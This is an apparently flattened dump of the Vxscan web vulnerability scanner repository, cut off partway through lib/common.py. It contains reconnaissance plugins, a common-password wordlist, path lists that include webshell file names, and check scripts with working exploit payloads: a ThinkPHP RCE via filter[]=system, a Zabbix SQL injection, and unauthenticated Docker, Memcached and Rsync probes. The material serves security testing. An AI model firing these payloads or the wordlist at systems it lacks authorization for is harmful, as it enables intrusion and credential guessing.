├── doc ├── logo.jpg ├── logo1.jpg └── logo2.jpg ├── data ├── GeoLite2-ASN.mmdb ├── path │ ├── txt.txt │ ├── dir.txt │ ├── jsp.txt │ ├── asp.txt │ ├── other.txt │ └── php.txt └── password.txt ├── report ├── fonts │ ├── element-icons.ttf │ └── element-icons.woff ├── en.js └── report.htm ├── .gitattributes ├── requirements.txt ├── lib ├── bcolors.py ├── random_header.py ├── common.py ├── web_info.py ├── settings.py ├── cli_output.py ├── vuln.py ├── options.py ├── url.py ├── Requests.py ├── verify.py ├── waf.py ├── sqldb.py └── iscdn.py ├── script ├── ftp_anonymous.py ├── django_urljump.py ├── pulse_cve_2019_11510.py ├── zookeeper_unauthorized_access.py ├── thinkphp5_rce_1.py ├── mongodb_unauthorized_access.py ├── redis_unauthorized_access.py ├── memcached_unauthorized_access.py ├── docker_unauthorized_access.py ├── jboss_jmx_console.py ├── http_put.py ├── thinkphp_5_0_23_rce.py ├── solr_unauthorized_access.py ├── phpinfo.py ├── rsync_unauthorized_access.py ├── fingerprint.py ├── get_title.py ├── zabbix_jsrpc_sqli.py ├── leaks.py ├── find_admin.py ├── solr_rce_via_velocity.py ├── Weblogic_CVE_2017_10271_RCE.py └── apache_struts_all.py ├── plugins ├── ActiveReconnaissance │ ├── robots.py │ ├── osdetect.py │ ├── check_waf.py │ ├── active.py │ └── crawl.py ├── PassiveReconnaissance │ ├── ip_history.py │ ├── virustotal.py │ ├── reverse_domain.py │ └── wappalyzer.py ├── InformationGathering │ ├── geoip.py │ └── js_leaks.py └── Scanning │ ├── dir_scan.py │ └── async_scan.py ├── Vxscan.py ├── .gitignore ├── .travis.yml ├── analyzer.py ├── README.zh-CN.md ├── LICENSE └── report.py /doc/logo.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/al0ne/Vxscan/HEAD/doc/logo.jpg -------------------------------------------------------------------------------- /doc/logo1.jpg: -------------------------------------------------------------------------------- 
https://raw.githubusercontent.com/al0ne/Vxscan/HEAD/doc/logo1.jpg -------------------------------------------------------------------------------- /doc/logo2.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/al0ne/Vxscan/HEAD/doc/logo2.jpg -------------------------------------------------------------------------------- /data/GeoLite2-ASN.mmdb: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/al0ne/Vxscan/HEAD/data/GeoLite2-ASN.mmdb -------------------------------------------------------------------------------- /report/fonts/element-icons.ttf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/al0ne/Vxscan/HEAD/report/fonts/element-icons.ttf -------------------------------------------------------------------------------- /report/fonts/element-icons.woff: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/al0ne/Vxscan/HEAD/report/fonts/element-icons.woff -------------------------------------------------------------------------------- /.gitattributes: -------------------------------------------------------------------------------- 1 | *.js linguist-language=python; 2 | *.css linguist-language=python; 3 | *.html linguist-language=python 4 | -------------------------------------------------------------------------------- /data/path/txt.txt: -------------------------------------------------------------------------------- 1 | /robots.txt 2 | /test2.txt 3 | /debug.txt 4 | /changelog.txt 5 | /readMe.txt 6 | /auth.txt 7 | /用户说明.txt 8 | /安装手册.txt 9 | /ftp.txt 10 | /ver.txt 11 | /install.txt 12 | /output.txt -------------------------------------------------------------------------------- /requirements.txt: -------------------------------------------------------------------------------- 1 | requests 2 | pyfiglet 3 | 
fake-useragent 4 | beautifulsoup4 5 | geoip2 6 | python-nmap 7 | tldextract 8 | lxml 9 | pymongo 10 | virustotal_python 11 | dnspython 12 | pysocks 13 | asyncio 14 | aiohttp 15 | chardet 16 | uvloop 17 | urllib3 18 | pyOpenSSL -------------------------------------------------------------------------------- /lib/bcolors.py: -------------------------------------------------------------------------------- 1 | class Bcolors: 2 | HEADER = '\033[95m' 3 | OKBLUE = '\033[94m' 4 | OKGREEN = '\033[92m' 5 | WARNING = '\033[93m' 6 | FAIL = '\033[91m' 7 | RED = '\033[31m' 8 | ENDC = '\033[0m' 9 | BOLD = '\033[1m' 10 | UNDERLINE = '\033[4m' 11 | -------------------------------------------------------------------------------- /script/ftp_anonymous.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | import ftplib 3 | 4 | from lib.verify import verify 5 | 6 | vuln = ['FTP', '21'] 7 | 8 | 9 | def check(url, ip, ports, apps): 10 | if verify(vuln, ports, apps): 11 | try: 12 | ftp = ftplib.FTP(ip) 13 | ftp.login('anonymous', 'anonymous') 14 | return 'FTP anonymous Login' 15 | except Exception as e: 16 | pass 17 | -------------------------------------------------------------------------------- /script/django_urljump.py: -------------------------------------------------------------------------------- 1 | from lib.Requests import Requests 2 | from lib.verify import verify 3 | 4 | vuln = ['Django'] 5 | 6 | 7 | def check(url, ip, ports, apps): 8 | req = Requests() 9 | if verify(vuln, ports, apps): 10 | payload = "//www.example.com" 11 | try: 12 | r = req.get(url + payload) 13 | if r.is_redirect and 'www.example.com' in r.headers.get('Location'): 14 | return 'Django < 2.0.8 任意URL跳转漏洞' 15 | except Exception as e: 16 | pass 17 | -------------------------------------------------------------------------------- /plugins/ActiveReconnaissance/robots.py: -------------------------------------------------------------------------------- 1 | # 
coding=utf-8 2 | import logging 3 | import re 4 | 5 | from lib.Requests import Requests 6 | 7 | 8 | def robots(url): 9 | result = '' 10 | try: 11 | req = Requests() 12 | r = req.get(url + '/robots.txt') 13 | if r.status_code == 200 and ')\d+\.\d+\.\d+\.\d+(?=)', r.text, re.S | re.I) 15 | if result: 16 | for i in result: 17 | if iscdn(i): 18 | out.append(i) 19 | except Exception: 20 | pass 21 | 22 | return out 23 | -------------------------------------------------------------------------------- /data/path/dir.txt: -------------------------------------------------------------------------------- 1 | /login/ 2 | /pma/ 3 | /pmd/ 4 | /admin/ 5 | /Admin/ 6 | /manager/ 7 | /solr/ 8 | /examples/ 9 | /cacti/ 10 | /ckeditor/samples/ 11 | /WEB-INF/classes/ 12 | /WEB-INF/lib/ 13 | /WEB-INF/src/ 14 | /zabbix/ 15 | /editor/ckeditor/samples/ 16 | /resin-admin/ 17 | /ganglia/ 18 | /server-info/ 19 | /xampp/ 20 | /nginx_status 21 | /phpMyAdmin 22 | /SiteServer 23 | /manage/ 24 | /system/ 25 | /uc_server 26 | /debug 27 | /Conf 28 | /webmail 29 | /service 30 | /memadmin 31 | /owa 32 | /harbor 33 | /master 34 | /root 35 | /zabbix 36 | /api 37 | /backup 38 | /inc 39 | /id_rsa 40 | /script 41 | /id_dsa 42 | /readme 43 | /key 44 | /configprops 45 | /keys 46 | /exit 47 | /core 48 | /Templates 49 | /ews 50 | /nagios 51 | /adminmanager 52 | /manager -------------------------------------------------------------------------------- /script/memcached_unauthorized_access.py: -------------------------------------------------------------------------------- 1 | import socket 2 | 3 | from lib.verify import verify 4 | 5 | vuln = ['Memcached', '11211'] 6 | 7 | 8 | def check(url, ip, ports, apps): 9 | if verify(vuln, ports, apps): 10 | socket.setdefaulttimeout(2) 11 | port = 11211 12 | payload = b'\x73\x74\x61\x74\x73\x0a' # command:stats 13 | s = socket.socket() 14 | socket.setdefaulttimeout(5) 15 | try: 16 | s.connect((ip, port)) 17 | s.send(payload) 18 | recvdata = s.recv(2048) # response larger than 
1024 19 | s.close() 20 | if recvdata and (b'STAT version' in recvdata): 21 | return '11211 Memcache Unauthorized Access' 22 | except Exception as e: 23 | print(e) 24 | -------------------------------------------------------------------------------- /script/docker_unauthorized_access.py: -------------------------------------------------------------------------------- 1 | import socket 2 | 3 | from lib.verify import verify 4 | 5 | vuln = ['docker', '2375'] 6 | 7 | 8 | def check(url, ip, ports, apps): 9 | socket.setdefaulttimeout(2) 10 | if verify(vuln, ports, apps): 11 | try: 12 | s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 13 | s.connect((ip, 2375)) 14 | payload = "GET /containers/json HTTP/1.1\r\nHost: %s:%s\r\n\r\n" % (ip, 2375) 15 | s.send(payload.encode()) 16 | recv = s.recv(1024) 17 | if b"HTTP/1.1 200 OK" in recv and b'Docker' in recv and b'Api-Version' in recv: 18 | return '2375 Docker unauthorized success' 19 | except Exception as e: 20 | # return '2375 Docker Failed' 21 | pass 22 | -------------------------------------------------------------------------------- /script/jboss_jmx_console.py: -------------------------------------------------------------------------------- 1 | # coding=utf-8 2 | # author: al0ne 3 | # https://github.com/al0ne 4 | 5 | import re 6 | 7 | from lib.Requests import Requests 8 | from lib.verify import get_list 9 | 10 | req = Requests() 11 | 12 | 13 | def get_title(url): 14 | try: 15 | payload = '/jmx-console/' 16 | r = req.get(url + payload) 17 | if "jboss" in r.text: 18 | return 'Jboss console/ page: ' + url + payload 19 | except Exception: 20 | pass 21 | 22 | 23 | def check(url, ip, ports, apps): 24 | result = [] 25 | probe = get_list(url, ports) 26 | for i in probe: 27 | if re.search(r':\d+', i): 28 | out = get_title(i) 29 | if out: 30 | result.append(out) 31 | if result: 32 | return result 33 | -------------------------------------------------------------------------------- /Vxscan.py: 
-------------------------------------------------------------------------------- 1 | # coding:utf-8 2 | 3 | # author: al0ne 4 | # https://github.com/al0ne 5 | 6 | import logging 7 | import os 8 | import sys 9 | 10 | from lib.cli_output import banner 11 | from lib.options import options 12 | 13 | if os.path.exists('error.log'): 14 | os.remove('error.log') 15 | 16 | if sys.version_info.major < 3 or sys.version_info.minor < 6: 17 | sys.stdout.write("Sorry, Vxscan requires Python 3.6/3.7/3.8 \n") 18 | sys.exit(1) 19 | 20 | 21 | if __name__ == "__main__": 22 | 23 | logging.basicConfig(filename='error.log', level=logging.ERROR) 24 | logging.getLogger() 25 | 26 | try: 27 | banner() 28 | options() 29 | except KeyboardInterrupt: 30 | print('\nCtrl+C Stop running\n') 31 | sys.exit(0) 32 | except Exception as e: 33 | logging.exception(e) 34 | -------------------------------------------------------------------------------- /script/http_put.py: -------------------------------------------------------------------------------- 1 | import requests 2 | import random 3 | from lib.random_header import get_ua 4 | from lib.verify import get_list 5 | 6 | 7 | def put(url): 8 | url = url.strip('/') 9 | text = random.randint(100000000, 200000000) 10 | payload = '/{}.txt'.format(text) 11 | url = url + payload 12 | data = {'{}'.format(text): '{}'.format(text)} 13 | r = requests.put(url, data=data, allow_redirects=False, verify=False, headers=get_ua()) 14 | if r.status_code == 201: 15 | return 'HTTP METHOD PUT url: {}'.format(url) 16 | 17 | 18 | def check(url, ip, ports, apps): 19 | result = '' 20 | try: 21 | probe = get_list(ip, ports) 22 | for url in probe: 23 | result = put(url) 24 | except Exception as e: 25 | pass 26 | if result: 27 | return result 28 | -------------------------------------------------------------------------------- /script/thinkphp_5_0_23_rce.py: -------------------------------------------------------------------------------- 1 | # coding=utf-8 2 | import random 3 | 4 | 
from lib.Requests import Requests 5 | from lib.verify import verify 6 | 7 | vuln = ['ThinkPHP', 'ThinkSNS'] 8 | random_num = ''.join(str(i) for i in random.sample(range(0, 9), 8)) 9 | 10 | 11 | def check(url, ip, ports, apps): 12 | req = Requests() 13 | if verify(vuln, ports, apps): 14 | payload = r'_method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=echo "{}"'.format(random_num) 15 | try: 16 | headers = {'Content-Type': 'application/x-www-form-urlencoded'} 17 | r = req.request(url + '/index.php?s=captcha', 'post', data=payload, headers=headers) 18 | if random_num in r.text: 19 | return 'thinkphp_5_0_23_rce | ' + url 20 | except Exception as e: 21 | pass 22 | -------------------------------------------------------------------------------- /script/solr_unauthorized_access.py: -------------------------------------------------------------------------------- 1 | import re 2 | 3 | from lib.Requests import Requests 4 | from lib.verify import get_list 5 | 6 | 7 | def get_info(url): 8 | try: 9 | req = Requests() 10 | url = url + '/solr/' 11 | r = req.get(url) 12 | if r.status_code is 200 and 'Solr Admin' in r.text and 'Dashboard' in r.text: 13 | return 'Apache Solr Admin leask: ' + url 14 | except Exception: 15 | pass 16 | 17 | 18 | def check(url, ip, ports, apps): 19 | result = [] 20 | try: 21 | probe = get_list(url, ports) 22 | for i in probe: 23 | if re.search(r':\d+', i): 24 | out = get_info(i) 25 | if out: 26 | result.append(out) 27 | if result: 28 | return result 29 | except Exception: 30 | pass 31 | -------------------------------------------------------------------------------- /script/phpinfo.py: -------------------------------------------------------------------------------- 1 | # coding=utf-8 2 | # author: al0ne 3 | # https://github.com/al0ne 4 | 5 | import re 6 | 7 | from lib.Requests import Requests 8 | from lib.verify import get_list 9 | 10 | path = ['/1.php', '/p.php', '/phpinfo.php', '/info.php', '/i.php', '/test.php', '/a.php', 
'/?phpinfo=1', '/111.php'] 11 | 12 | 13 | def get_info(url): 14 | try: 15 | req = Requests() 16 | for i in path: 17 | r = req.get(url + i) 18 | if r.status_code == 200: 19 | if 'phpinfo()' in r.text or 'php_version' in r.text: 20 | return 'phpinfo leaks: ' + url + i 21 | except: 22 | pass 23 | 24 | 25 | def check(url, ip, ports, apps): 26 | result = [] 27 | probe = get_list(url, ports) 28 | for i in probe: 29 | if re.search(r':\d+', i): 30 | out = get_info(i) 31 | if out: 32 | result.append(out) 33 | if result: 34 | return result 35 | -------------------------------------------------------------------------------- /script/rsync_unauthorized_access.py: -------------------------------------------------------------------------------- 1 | import socket 2 | 3 | from lib.verify import verify 4 | 5 | timeout = 3 6 | 7 | vuln = ['rsync', '873'] 8 | 9 | 10 | def check(url, ip, ports, apps): 11 | if verify(vuln, ports, apps): 12 | try: 13 | socket.setdefaulttimeout(1.5) 14 | payload = b"\x40\x52\x53\x59\x4e\x43\x44\x3a\x20\x33\x31\x2e\x30\x0a" 15 | socket.setdefaulttimeout(timeout) 16 | sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 17 | server_address = (ip, 873) 18 | sock.connect(server_address) 19 | sock.sendall(payload) 20 | initinfo = sock.recv(400) 21 | if b"RSYNCD" in initinfo: 22 | sock.sendall(b"\x0a") 23 | modulelist = sock.recv(200) 24 | sock.close() 25 | if len(modulelist) > 0: 26 | return '873 Rsync Unauthorized Access' 27 | except Exception as e: 28 | pass 29 | -------------------------------------------------------------------------------- /lib/random_header.py: -------------------------------------------------------------------------------- 1 | # author: al0ne 2 | # https://github.com/al0ne 3 | 4 | import random 5 | import socket 6 | import string 7 | import struct 8 | 9 | from fake_useragent import UserAgent 10 | 11 | HEADERS = { 12 | 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8', 13 | 'User-Agent': "", 14 | 'Referer': 
"", 15 | 'X-Forwarded-For': "", 16 | 'X-Real-IP': "", 17 | 'Connection': 'keep-alive', 18 | } 19 | 20 | 21 | def get_ua(): 22 | ua = UserAgent() 23 | key = random.random() * 20 24 | referer = ''.join([random.choice(string.ascii_letters + string.digits) for _ in range(int(key))]) 25 | referer = 'www.' + referer.lower() + '.com' 26 | ip = socket.inet_ntoa(struct.pack('>I', random.randint(1, 0xffffffff))) 27 | HEADERS["User-Agent"] = ua.random 28 | HEADERS["Referer"] = referer 29 | HEADERS["X-Forwarded-For"] = HEADERS["X-Real-IP"] = ip 30 | 31 | return HEADERS 32 | 33 | 34 | if __name__ == "__main__": 35 | print(get_ua()) 36 | -------------------------------------------------------------------------------- /plugins/ActiveReconnaissance/osdetect.py: -------------------------------------------------------------------------------- 1 | # coding=utf-8 2 | # author: al0ne 3 | # https://github.com/al0ne 4 | 5 | import logging 6 | import xml 7 | 8 | import nmap 9 | 10 | from lib.cli_output import console 11 | 12 | 13 | def osdetect(ip): 14 | # sys.stdout.write(Bcolors.RED + "\nOS:\n" + Bcolors.ENDC) 15 | nm = nmap.PortScanner() 16 | try: 17 | result = nm.scan(hosts=ip, arguments='-sS -O -vv -n -T4 -p 80,22,443') 18 | for k, v in result.get('scan').items(): 19 | if v.get('osmatch'): 20 | for i in v.get('osmatch'): 21 | console('OSdetect', ip, i.get('name') + '\n') 22 | return i.get('name') 23 | else: 24 | break 25 | except (xml.etree.ElementTree.ParseError, nmap.nmap.PortScannerError): 26 | pass 27 | except Exception as e: 28 | console('OSdetect', ip, 'None\n') 29 | logging.exception(e) 30 | 31 | 32 | if __name__ == "__main__": 33 | os = osdetect('127.0.0.1') 34 | -------------------------------------------------------------------------------- /script/fingerprint.py: -------------------------------------------------------------------------------- 1 | # coding=utf-8 2 | # author: al0ne 3 | # https://github.com/al0ne 4 | 5 | import re 6 | 7 | import chardet 8 | 9 | from 
lib.Requests import Requests 10 | from lib.verify import get_list 11 | from plugins.PassiveReconnaissance.wappalyzer import WebPage 12 | 13 | req = Requests() 14 | 15 | 16 | def get_title(url): 17 | try: 18 | r = req.get(url) 19 | coding = chardet.detect(r.content).get('encoding') 20 | text = r.content[:10000].decode(coding) 21 | webinfo = WebPage(r.url, text, r.headers).info() 22 | if webinfo.get('apps'): 23 | return 'URL: ' + url + ' | Fingerprint: ' + ' , '.join(webinfo.get('apps')) 24 | except: 25 | pass 26 | 27 | 28 | def check(url, ip, ports, apps): 29 | result = [] 30 | probe = get_list(url, ports) 31 | for i in probe: 32 | if re.search(r':\d+', i): 33 | out = get_title(i) 34 | if out: 35 | result.append(out) 36 | if result: 37 | return result 38 | -------------------------------------------------------------------------------- /.gitignore: -------------------------------------------------------------------------------- 1 | # Byte-compiled / optimized / DLL files 2 | __pycache__/ 3 | *.py[cod] 4 | 5 | test.py 6 | 7 | # C extensions 8 | *.so 9 | .vscode/ 10 | # Distribution / packaging 11 | .Python 12 | env/ 13 | build/ 14 | develop-eggs/ 15 | dist/ 16 | downloads/ 17 | eggs/ 18 | .eggs/ 19 | lib64/ 20 | parts/ 21 | sdist/ 22 | var/ 23 | *.egg-info/ 24 | .installed.cfg 25 | *.egg 26 | .idea/ 27 | 28 | # PyInstaller 29 | # Usually these files are written by a python script from a template 30 | # before PyInstaller builds the exe, so as to inject date/other infos into it. 
31 | *.manifest 32 | *.spec 33 | 34 | # Installer logs 35 | pip-log.txt 36 | pip-delete-this-directory.txt 37 | 38 | # Unit test / coverage reports 39 | htmlcov/ 40 | .tox/ 41 | .coverage 42 | .coverage.* 43 | .cache 44 | nosetests.xml 45 | coverage.xml 46 | *,cover 47 | 48 | # Translations 49 | *.mo 50 | *.pot 51 | 52 | # Django stuff: 53 | *.log 54 | 55 | # Sphinx documentation 56 | docs/_build/ 57 | 58 | # PyBuilder 59 | target/ 60 | *.html 61 | Vxscan.zip 62 | db/GeoLite2-City.mmdb 63 | 64 | *.json -------------------------------------------------------------------------------- /data/path/jsp.txt: -------------------------------------------------------------------------------- 1 | /SearchPublicRegistries.jsp 2 | /resin-doc/viewfile/?contextpath=/&servletpath=&file=index.jsp 3 | /jsp.jsp 4 | /wcm/app/login.jsp 5 | /console/login/LoginForm.jsp 6 | /vaf.jsp 7 | /158.jsp 8 | /123.jsp 9 | /111.jsp 10 | /shangji.jsp 11 | /text.jsp 12 | /fang.jsp 13 | /aurrs.jsp 14 | /k.jsp 15 | /ziyoubi.jsp 16 | /lcyx.jsp 17 | /weijishi.jsp 18 | /1.jsp 19 | /jumbo.jsp 20 | /test.jsp 21 | /1111.jsp 22 | /bak.jsp 23 | /is.test.jsp 24 | /a.jsp 25 | /tunnel.jsp 26 | /3.jsp 27 | /cqtest.jsp 28 | /zzzz.jsp 29 | /Jspspyweb.jsp 30 | /welcome.jsp 31 | /403.jsp 32 | /ma.jsp 33 | /index.jsp 34 | /kid.jsp 35 | /tt2.jsp 36 | /fuckfuck.jsp 37 | /index.jsp 38 | /job.jsp 39 | /c.jsp 40 | /conifgs.jsp 41 | /2.jsp 42 | /b001.jsp 43 | /jspspy.jsp 44 | /panel.jsp 45 | /dynamicattrs.jsp 46 | /hello.jsp 47 | /login.jsp 48 | /GSDLYT.jsp 49 | /bss.jsp 50 | /ck_gz.jsp 51 | /examples.jsp 52 | /include.jsp 53 | /lele.jsp 54 | /plugin.jsp 55 | /wlscmd.jsp 56 | /zzxas.jsp 57 | /loginUser.action 58 | /login.action 59 | /login.do 60 | /upload.do 61 | /admin.do 62 | /SearchServlet.do 63 | /autoFormController.do 64 | /bindUser.do 65 | /ddcx.do -------------------------------------------------------------------------------- /script/get_title.py: 
-------------------------------------------------------------------------------- 1 | # coding=utf-8 2 | # author: al0ne 3 | # https://github.com/al0ne 4 | 5 | import re 6 | 7 | import chardet 8 | from lxml import etree 9 | 10 | from lib.Requests import Requests 11 | from lib.verify import get_list 12 | 13 | req = Requests() 14 | 15 | 16 | def get_title(url): 17 | code = 0 18 | 19 | try: 20 | r = req.get(url) 21 | code = r.status_code 22 | coding = chardet.detect(r.content).get('encoding') 23 | text = r.content[:10000].decode(coding) 24 | html = etree.HTML(text) 25 | title = html.xpath('//title/text()') 26 | if title: 27 | return url + ' | ' + title[0] 28 | else: 29 | return url + ' | Status_code: ' + str(code) 30 | except: 31 | pass 32 | 33 | return url + ' | Status_code: ' + str(code) 34 | 35 | 36 | def check(url, ip, ports, apps): 37 | result = [] 38 | probe = get_list(url, ports) 39 | for i in probe: 40 | if re.search(r':\d+', i): 41 | out = get_title(i) 42 | if out: 43 | result.append(out) 44 | if result: 45 | return result 46 | -------------------------------------------------------------------------------- /script/zabbix_jsrpc_sqli.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # -*- coding: utf-8 -*- 3 | # project = https://github.com/Xyntax/POC-T 4 | # author = i@cdxy.me 5 | """ 6 | ZABBIX jsrpc.php 参数profileIdx2 insert SQL注入漏洞 7 | 8 | zabbix的jsrpc的profileIdx2参数存在insert方式的SQL注入漏洞, 在开启guest的情况下,攻击者无需授权登陆即可登陆zabbix管理系统, 也可通过script等功能轻易直接获取zabbix服务器的操作系统权限。 9 | 10 | Usage: 11 | python POC-T.py -s zabbix-jsrpc-sqli -aZ "zabbix country:us" 12 | 13 | Version 14 | v2.2.x, 3.0.0-3.0.3 15 | 16 | """ 17 | from lib.Requests import Requests 18 | from lib.verify import verify 19 | 20 | vuln = ['zabbix'] 21 | 22 | 23 | def check(url, ip, ports, apps): 24 | req = Requests() 25 | if verify(vuln, ports, apps): 26 | payload = 
r"/jsrpc.php?type=9&method=screen.get×tamp=1471403798083&pageFile=history.php&profileIdx=web.item.graph&profileIdx2=1+or+updatexml(1,md5(0x11),1)+or+1=1)%23&updateProfile=true&period=3600&stime=20160817050632&resourcetype=17" 27 | try: 28 | r = req.get(url + payload) 29 | if ('ed733b8d10be225eceba344d533586' in r.text) or ('SQL error ' in r.text): 30 | return 'CVE-2016-10134 zabbix sqli:' + url 31 | except Exception as e: 32 | pass 33 | -------------------------------------------------------------------------------- /.travis.yml: -------------------------------------------------------------------------------- 1 | language: python 2 | script: true 3 | 4 | matrix: 5 | include: 6 | - name: "Python 3.6 on Linux" 7 | python: 3.6 # this works for Linux but is ignored on macOS or Windows 8 | - name: "Python 3.7 on Xenial Linux" 9 | python: 3.7 # this works for Linux but is ignored on macOS or Windows 10 | dist: xenial # required for Python >= 3.7 11 | - name: "Python 3.8 on Xenial Linux" 12 | python: 3.8-dev # this works for Linux but is ignored on macOS or Windows 13 | dist: xenial # required for Python >= 3.7 14 | - name: "Python 3.7 on macOS" 15 | os: osx 16 | osx_image: xcode10.2 # Python 3.7 running on macOS 10.14.3 17 | language: shell # 'language: python' is an error on Travis CI macOS 18 | - name: "Python 3.7 on Windows" 19 | os: windows # Windows 10.0.17134 N/A Build 17134 20 | language: shell 21 | before_install: 22 | - choco install python 23 | - python -m pip install --upgrade pip 24 | env: PATH=/c/Python37:/c/Python37/Scripts:$PATH 25 | 26 | install: 27 | - pip3 install -U pip 28 | - pip3 install codecov 29 | - pip3 install -r requirements.txt 30 | -------------------------------------------------------------------------------- /plugins/InformationGathering/geoip.py: -------------------------------------------------------------------------------- 1 | # coding=utf-8 2 | # author: al0ne 3 | # https://github.com/al0ne 4 | 5 | import logging 6 | 7 | import 
geoip2.database 8 | import geoip2.errors 9 | 10 | from lib.cli_output import console 11 | 12 | 13 | def geoip(ipaddr): 14 | # 获取IP地理位置 15 | try: 16 | reader = geoip2.database.Reader('data/GeoLite2-City.mmdb') 17 | response = reader.city(ipaddr) 18 | country = response.country.names["zh-CN"] 19 | site = response.subdivisions.most_specific.names.get("zh-CN") 20 | if not site: 21 | site = '' 22 | city = response.city.names.get("zh-CN") 23 | if not city: 24 | city = '' 25 | address = '{} {} {}'.format(country, site, city) 26 | except FileNotFoundError: 27 | address = 'Geoip File Not Found' 28 | except (KeyError, geoip2.errors.AddressNotFoundError): 29 | address = 'Address Not In Databases' 30 | except Exception as e: 31 | logging.exception(e) 32 | address = 'None' 33 | console('GeoIP', ipaddr, 'Address: {}\n'.format(address)) 34 | console('GeoIP', ipaddr, 'Ipaddr: {}\n'.format(ipaddr)) 35 | return address 36 | 37 | 38 | if __name__ == "__main__": 39 | geoip('1.1.1.1') 40 | -------------------------------------------------------------------------------- /plugins/PassiveReconnaissance/virustotal.py: -------------------------------------------------------------------------------- 1 | # coding=utf-8 2 | import re 3 | 4 | from virustotal_python import Virustotal 5 | 6 | from lib.cli_output import console 7 | from lib.iscdn import iscdn 8 | from lib.settings import VIRUSTOTAL_API 9 | from plugins.PassiveReconnaissance.ip_history import ipinfo 10 | 11 | 12 | def virustotal(host): 13 | # VT接口,主要用来查询PDNS,绕过CDN 14 | pdns = [] 15 | history_ip = [] 16 | if VIRUSTOTAL_API: 17 | # noinspection PyBroadException 18 | try: 19 | vtotal = Virustotal(VIRUSTOTAL_API) 20 | if re.search(r'\d+\.\d+\.\d+\.\d+', host): 21 | return None 22 | resp = vtotal.domain_report(host) 23 | if resp.get('status_code') != 403: 24 | for i in resp.get('json_resp').get('resolutions'): 25 | address = i.get('ip_address') 26 | timeout = i.get('last_resolved') 27 | if iscdn(address): 28 | history_ip.append(address 
+ ' : ' + timeout) 29 | pdns = history_ip[10:] 30 | except Exception: 31 | pass 32 | 33 | pdns.extend(ipinfo(host)) 34 | 35 | if pdns: 36 | for i in pdns[:10]: 37 | console('PDNS', host, i + '\n') 38 | else: 39 | console('PDNS', host, 'None\n') 40 | return pdns 41 | -------------------------------------------------------------------------------- /script/leaks.py: -------------------------------------------------------------------------------- 1 | # coding=utf-8 2 | # author: al0ne 3 | # https://github.com/al0ne 4 | 5 | import re 6 | from lib.Requests import Requests 7 | from lib.verify import get_list 8 | from lib.settings import PAGE_404 9 | 10 | path = [ 11 | '/.git/config', '/.svn/entries', '/.git/index', '/.git/HEAD', '/.ssh/known_hosts', '/.DS_Store', '/.hg', 12 | '/WEB-INF/web.xml', '/WEB-INF/database.properties', '/CVS/Entries', '/_cat/' 13 | ] 14 | 15 | 16 | def verify(text): 17 | result = True 18 | for i in PAGE_404: 19 | if i in text: 20 | result = False 21 | break 22 | return result 23 | 24 | 25 | def get_info(url): 26 | try: 27 | req = Requests() 28 | for i in path: 29 | r = req.get(url + i) 30 | if r.status_code == 200 and '<html' not in r.text: 31 | if not re.search(r'{"\w+":|<head>|<form\s|<div\s|<input\s|<html|</a>|Active connections', r.text): 32 | if verify(r.text): 33 | return 'leaks : ' + url + i 34 | except: 35 | pass 36 | 37 | 38 | def check(url, ip, ports, apps): 39 | result = [] 40 | probe = get_list(url, ports) 41 | for i in probe: 42 | if re.search(r':\d+', i): 43 | out = get_info(i) 44 | if out: 45 | result.append(out) 46 | if result: 47 | return result 48 | -------------------------------------------------------------------------------- /data/password.txt: -------------------------------------------------------------------------------- 1 | 123456789 2 | password 3 | passwd 4 | a123456 5 | pass 6 | user 7 | root 8 | 123456 9 | a123456789 10 | 1234567890 11 | qq123456 12 | abc123456 13 | 123456a 14 | Oracle@123 15 | 123456789a 16 | admin. 
17 | 147258369 18 | zxcvbnm 19 | admin 20 | zkeys 21 | admin888 22 | zebra 23 | admin999 24 | 987654321 25 | 12345 26 | conexant 27 | adsl1234 28 | 12345678910 29 | abc123 30 | qq123456789 31 | 123456789. 32 | 666666 33 | 88888888 34 | 7708801314520 35 | 5201314520 36 | q123456 37 | 123456abc 38 | 1233211234567 39 | 123123123 40 | 123456. 41 | 0123456789 42 | asd123456 43 | aa123456 44 | 135792468 45 | q123456789 46 | abcd123456 47 | 12345678900 48 | zxcvbnm123 49 | w123456 50 | abc123456789 51 | 111111 52 | qwertyuiop 53 | 1314520520 54 | 1234567891 55 | qwe123456 56 | dorado 57 | manager 58 | adminer 59 | firewall 60 | telnetpwd 61 | shell 62 | asd123 63 | 000000 64 | 1472583690 65 | 1357924680 66 | 1q2w3e4r 67 | 789456123 68 | 123456789abc 69 | z123456 70 | 1234567899 71 | aaa123456 72 | abcd1234 73 | www123456 74 | 123456789q 75 | 123abc 76 | qwe123 77 | w123456789 78 | 7894561230 79 | 123456qq 80 | zxc123456 81 | 123456789qq 82 | 1111111111 83 | admin123 84 | default 85 | Admin123 86 | 111111111 87 | 12344321 88 | qazwsxedc 89 | qwerty 90 | 123456.. 
91 | zxc123 92 | system 93 | guest 94 | asdfghjkl 95 | security 96 | administrator 97 | 0000000000 98 | 1234554321 99 | 123456q 100 | 123456aa -------------------------------------------------------------------------------- /lib/common.py: -------------------------------------------------------------------------------- 1 | # author: al0ne 2 | # https://github.com/al0ne 3 | 4 | import re 5 | 6 | from lib.iscdn import iscdn 7 | from lib.settings import SCANDIR, CRAWL 8 | from lib.sqldb import Sqldb 9 | from lib.url import parse_ip 10 | from lib.verify import verify_https 11 | from lib.vuln import Vuln 12 | from lib.web_info import web_info 13 | from plugins.ActiveReconnaissance.crawl import Crawl 14 | from plugins.Scanning.async_scan import DirScan 15 | from plugins.Scanning.port_scan import ScanPort 16 | 17 | 18 | def web_save(webinfo, dbname): 19 | Sqldb(dbname).get_webinfo(webinfo) 20 | 21 | 22 | def start(target, dbname='result'): 23 | if dbname != 'result': 24 | dbname = re.sub(r'.db', '', dbname) 25 | title = 'test' 26 | host = parse_ip(target) 27 | url = verify_https(target) 28 | if url: 29 | isopen = True 30 | else: 31 | isopen = False 32 | if isopen: 33 | data, apps, title = web_info(url) 34 | else: 35 | data = '' 36 | apps = {} 37 | if 